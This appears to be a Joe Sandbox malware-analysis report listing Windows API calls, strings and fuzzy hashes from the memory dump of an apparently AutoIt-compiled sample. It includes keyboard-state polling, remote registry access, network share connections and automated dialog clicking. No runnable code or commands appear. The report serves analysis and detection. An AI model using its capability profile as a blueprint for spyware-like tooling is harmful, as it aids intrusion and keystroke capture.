                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                          • String ID:
                                                          • API String ID: 1500180987-0
                                                          • Opcode ID: 08b514678e6faaf4d98abef753982be35f715409adb368dc3e3df2946a53baf9
                                                          • Instruction ID: 421e667a39c4f7a771b2f1d60cce2ffe730fd21b3c11d2b5d8b70b63e080432a
                                                          • Opcode Fuzzy Hash: 08b514678e6faaf4d98abef753982be35f715409adb368dc3e3df2946a53baf9
                                                          • Instruction Fuzzy Hash: 6CC14CB1D10229ABCF21DFA5CC85ADEB7BDEF44340F0040AAF609E7151EB709A948F65
                                                          APIs
                                                          • _memset.LIBCMT ref: 00265BF1
                                                          • GetMenuItemCount.USER32(00317890), ref: 002A0E7B
                                                          • GetMenuItemCount.USER32(00317890), ref: 002A0F2B
                                                          • GetCursorPos.USER32(?), ref: 002A0F6F
                                                          • SetForegroundWindow.USER32(00000000), ref: 002A0F78
                                                          • TrackPopupMenuEx.USER32(00317890,00000000,?,00000000,00000000,00000000), ref: 002A0F8B
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002A0F97
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                          • String ID:
                                                          • API String ID: 2751501086-0
                                                          • Opcode ID: a2c1dd2b5eae53e38e237181fa97c35a45ab0a9bfc3fdc255b49782354b07551
                                                          • Instruction ID: 1263eadf54ca42a28cf5a2a1212160c5acfe943b2945a9740a42267cd15b33b4
                                                          • Opcode Fuzzy Hash: a2c1dd2b5eae53e38e237181fa97c35a45ab0a9bfc3fdc255b49782354b07551
                                                          • Instruction Fuzzy Hash: E371D030664716BFEB208F54DCC9FAABF64FB05764F200206F518AA1D0CBB168B0DB90
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,002E0980), ref: 002BAF4E
                                                          • GetDriveTypeW.KERNEL32(00000061,0030B5F0,00000061), ref: 002BB018
                                                          • _wcscpy.LIBCMT ref: 002BB042
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                          • String ID: L,.$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2820617543-2424329516
                                                          • Opcode ID: d288946946b8d8c111c804799f5b53fca68f41e04b53ceafdea8f7768fed1240
                                                          • Instruction ID: 7dbf75c8ac2891e51ec44f343593cfaf4b481f8d4c28ecfa07d2f1f7135f0ef6
                                                          • Opcode Fuzzy Hash: d288946946b8d8c111c804799f5b53fca68f41e04b53ceafdea8f7768fed1240
                                                          • Instruction Fuzzy Hash: A851CC301383059BC311EF14C891AEAB7A5EF95384F54881DF896572E2EBB1ED69CE42
                                                          APIs
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          • _memset.LIBCMT ref: 002A8489
                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002A84BE
                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002A84DA
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002A84F6
                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002A8520
                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002A8548
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002A8553
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002A8558
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                          • API String ID: 1411258926-22481851
                                                          • Opcode ID: 13c81489f3cc033610ac64d7c248a4c3ad63e39d1f18c0e7a2cb60afde10c4a9
                                                          • Instruction ID: b8d5241841c7a5a0e6636e87786a9154d102ff22371ba32980bb80943aa60c99
                                                          • Opcode Fuzzy Hash: 13c81489f3cc033610ac64d7c248a4c3ad63e39d1f18c0e7a2cb60afde10c4a9
                                                          • Instruction Fuzzy Hash: 5241F772C2022DABCB15EFA4DC95DEDB7B8FF08341B044169E905A6161EA70AE65CF90
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D040D,?,?), ref: 002D1491
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 3964851224-909552448
                                                          • Opcode ID: 5398920380f1ac6276ea6fbec9705e207a0e1a763bc512662b30bcdaa224a110
                                                          • Instruction ID: c4a1cc48192323bc7f03be6479dd4dcbc9324f3ea01c1bd1025d84a68476a630
                                                          • Opcode Fuzzy Hash: 5398920380f1ac6276ea6fbec9705e207a0e1a763bc512662b30bcdaa224a110
                                                          • Instruction Fuzzy Hash: 3141543453025AEBCF11EF90E890AEA3324EF55300FA08516FC524B692DB74ED79CB60
                                                          APIs
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                            • Part of subcall function 0026153B: _memmove.LIBCMT ref: 002615C4
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002B58EB
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002B5901
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002B5912
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002B5924
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002B5935
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: SendString$_memmove
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2279737902-1007645807
                                                          • Opcode ID: c8ea11af5ade714b6283698d6bfaada99b9b506f0ba57a931235cd5a6ebacebd
                                                          • Instruction ID: 88c6cb20f00518cf579cfc050872caf662d5a6293943a3a12e20726d2a1887b6
                                                          • Opcode Fuzzy Hash: c8ea11af5ade714b6283698d6bfaada99b9b506f0ba57a931235cd5a6ebacebd
                                                          • Instruction Fuzzy Hash: 731108305A1169B9D710A7A1CC5AEFFBB7CEFD1B50F940469B401970D0EFA02D60C9E0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 208665112-3771769585
                                                          • Opcode ID: 3a82af64131829c76f135d999acedec603e64583da67a1a1751876854e9e7624
                                                          • Instruction ID: 9739190649dc46d313c495f67ee7370da8dd744c9374e859cf124441e4cc6199
                                                          • Opcode Fuzzy Hash: 3a82af64131829c76f135d999acedec603e64583da67a1a1751876854e9e7624
                                                          • Instruction Fuzzy Hash: 02110D31925115ABCB11BB649CC9EDA7BBCDF41B50F0441A6F44896093EFB099E28FA1
                                                          APIs
                                                          • timeGetTime.WINMM ref: 002B5535
                                                            • Part of subcall function 0027083E: timeGetTime.WINMM(?,00000002,0025C22C), ref: 00270842
                                                          • Sleep.KERNEL32(0000000A), ref: 002B5561
                                                          • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 002B5585
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002B55A7
                                                          • SetActiveWindow.USER32 ref: 002B55C6
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002B55D4
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 002B55F3
                                                          • Sleep.KERNEL32(000000FA), ref: 002B55FE
                                                          • IsWindow.USER32 ref: 002B560A
                                                          • EndDialog.USER32(00000000), ref: 002B561B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: 081b3d34b62c5568a56a24087e1e58cb05dc02bc2fefbe5afb54fd0930dcdd95
                                                          • Instruction ID: 50e4c626114d2cb3aa3e906c83d0b5e6761496524302bdbdf495a8fe5957253a
                                                          • Opcode Fuzzy Hash: 081b3d34b62c5568a56a24087e1e58cb05dc02bc2fefbe5afb54fd0930dcdd95
                                                          • Instruction Fuzzy Hash: 6E21D170254645AFEB525F60FCCCBA63B6FEB49385F445014F0018A1A1CFB19CA2CB35
                                                          APIs
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • CoInitialize.OLE32(00000000), ref: 002BDC2D
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002BDCC0
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 002BDCD4
                                                          • CoCreateInstance.OLE32(002E3D4C,00000000,00000001,0030B86C,?), ref: 002BDD20
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002BDD8F
                                                          • CoTaskMemFree.OLE32(?,?), ref: 002BDDE7
                                                          • _memset.LIBCMT ref: 002BDE24
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 002BDE60
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002BDE83
                                                          • CoTaskMemFree.OLE32(00000000), ref: 002BDE8A
                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002BDEC1
                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 002BDEC3
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                          • String ID:
                                                          • API String ID: 1246142700-0
                                                          • Opcode ID: 13b0b3f65a6c665ac293e253f74b90debad8f7f3fb8a3c07e827bd6d1642163a
                                                          • Instruction ID: 920c3dd31a3880abf13fb2f7d9af68496269cf0424046e80603466f686531ab9
                                                          • Opcode Fuzzy Hash: 13b0b3f65a6c665ac293e253f74b90debad8f7f3fb8a3c07e827bd6d1642163a
                                                          • Instruction Fuzzy Hash: E2B10A75A10109AFDB04DFA4C888DAEBBF9FF48304B1484A9E909EB251DB70EE55CF50
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 002B0896
                                                          • SetKeyboardState.USER32(?), ref: 002B0901
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 002B0921
                                                          • GetKeyState.USER32(000000A0), ref: 002B0938
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 002B0967
                                                          • GetKeyState.USER32(000000A1), ref: 002B0978
                                                          • GetAsyncKeyState.USER32(00000011), ref: 002B09A4
                                                          • GetKeyState.USER32(00000011), ref: 002B09B2
                                                          • GetAsyncKeyState.USER32(00000012), ref: 002B09DB
                                                          • GetKeyState.USER32(00000012), ref: 002B09E9
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 002B0A12
                                                          • GetKeyState.USER32(0000005B), ref: 002B0A20
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: df194b70aa2288b40bdc1d2e4c756214b04784f05412274e13725c190e4214c7
                                                          • Instruction ID: 0f330ed95f81807a242924ed4df37c4bf155a21fbf44171970534cffb185026a
                                                          • Opcode Fuzzy Hash: df194b70aa2288b40bdc1d2e4c756214b04784f05412274e13725c190e4214c7
                                                          • Instruction Fuzzy Hash: B451E93091478529FB36DFA044957EBBFB49F017C0F488599C5C2571C3DA64ABACCBA1
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 002ACE1C
                                                          • GetWindowRect.USER32(00000000,?), ref: 002ACE2E
                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002ACE8C
                                                          • GetDlgItem.USER32(?,00000002), ref: 002ACE97
                                                          • GetWindowRect.USER32(00000000,?), ref: 002ACEA9
                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002ACEFD
                                                          • GetDlgItem.USER32(?,000003E9), ref: 002ACF0B
                                                          • GetWindowRect.USER32(00000000,?), ref: 002ACF1C
                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002ACF5F
                                                          • GetDlgItem.USER32(?,000003EA), ref: 002ACF6D
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002ACF8A
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 002ACF97
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: 152f33e4050c4913ea1f74cd424874171fc81065d3324cda7c998005593ac603
                                                          • Instruction ID: 993928437af7d5abcbca78ee162106f8ace24bafc97daae6b01787f9d8107206
                                                          • Opcode Fuzzy Hash: 152f33e4050c4913ea1f74cd424874171fc81065d3324cda7c998005593ac603
                                                          • Instruction Fuzzy Hash: 9C517271B50205AFDB18CFA8DDC9E6EBBBAEB88310F14812DF515D7290DBB09D518B50
                                                          APIs
                                                            • Part of subcall function 002529AB: GetWindowLongW.USER32(?,000000EB), ref: 002529BC
                                                          • GetSysColor.USER32(0000000F), ref: 002525AF
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: bfe8981fd9d24a2e3cbe583bc951c891d709a45aa86f3587ee298d816e489e0c
                                                          • Instruction ID: a10ef1f59c43c66ea2938587d4c9b6be01f9685b9a2ad69cb0a3db5c12ccfd76
                                                          • Opcode Fuzzy Hash: bfe8981fd9d24a2e3cbe583bc951c891d709a45aa86f3587ee298d816e489e0c
                                                          • Instruction Fuzzy Hash: 6A41C230114140EFDB256F68A8CCBB93769EB0A332F184265FD698E1E5D7708C9ADB25
                                                          APIs
                                                            • Part of subcall function 00270B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00262A3E,?,00008000), ref: 00270BA7
                                                            • Part of subcall function 00270284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00262A58,?,00008000), ref: 002702A4
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00262ADF
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00262C2C
                                                            • Part of subcall function 00263EBE: _wcscpy.LIBCMT ref: 00263EF6
                                                            • Part of subcall function 0027386D: _iswctype.LIBCMT ref: 00273875
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                          • API String ID: 537147316-3738523708
                                                          • Opcode ID: 63b2cc6e5c81f462754cb9d497650efad1f7bb7580d3928911b298b779cba12c
                                                          • Instruction ID: bf9ffe734c05c053c1b2388d779bedea8298b89d9da0819ba23a53e5b36482eb
                                                          • Opcode Fuzzy Hash: 63b2cc6e5c81f462754cb9d497650efad1f7bb7580d3928911b298b779cba12c
                                                          • Instruction Fuzzy Hash: CD02D030128341DFC764EF24C981AAFBBE5AF85344F14491EF489932A2DB30D9A9CF52
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __i64tow__itow__swprintf
                                                          • String ID: %.15g$0x%p$False$True
                                                          • API String ID: 421087845-2263619337
                                                          • Opcode ID: e0355465f777cba568a94c0015134ebc34d7712a63ceb0aaa1465a7f09bcc2f4
                                                          • Instruction ID: d4241989b0eccbce50ed0dbde72d42b32881d062b20f34d79af35c1ab0a95c42
                                                          • Opcode Fuzzy Hash: e0355465f777cba568a94c0015134ebc34d7712a63ceb0aaa1465a7f09bcc2f4
                                                          • Instruction Fuzzy Hash: 5A41D27563520AAADB24EF64C841E7AB3F8AB04304F20446AE54DD72D2EA7199A98B11
                                                          APIs
                                                          • _memset.LIBCMT ref: 002D778F
                                                          • CreateMenu.USER32 ref: 002D77AA
                                                          • SetMenu.USER32(?,00000000), ref: 002D77B9
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D7846
                                                          • IsMenu.USER32(?), ref: 002D785C
                                                          • CreatePopupMenu.USER32 ref: 002D7866
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D7893
                                                          • DrawMenuBar.USER32 ref: 002D789B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                          • String ID: 0$F
                                                          • API String ID: 176399719-3044882817
                                                          • Opcode ID: cd8d3ac7f6b8bb9e84d8ea7299aed401acdb8d1a49c5b509d0a02c9f2d26041b
                                                          • Instruction ID: 752e7b652c7994592bbd63fca636af75d4678341d852d527a822c884e1b17ae8
                                                          • Opcode Fuzzy Hash: cd8d3ac7f6b8bb9e84d8ea7299aed401acdb8d1a49c5b509d0a02c9f2d26041b
                                                          • Instruction Fuzzy Hash: C9415B74A14209EFDB20DF64E888AAABBF5FF49310F184429F945A7360D774AD21EF50
                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002D7B83
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 002D7B8A
                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002D7B9D
                                                          • SelectObject.GDI32(00000000,00000000), ref: 002D7BA5
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 002D7BB0
                                                          • DeleteDC.GDI32(00000000), ref: 002D7BB9
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 002D7BC3
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002D7BD7
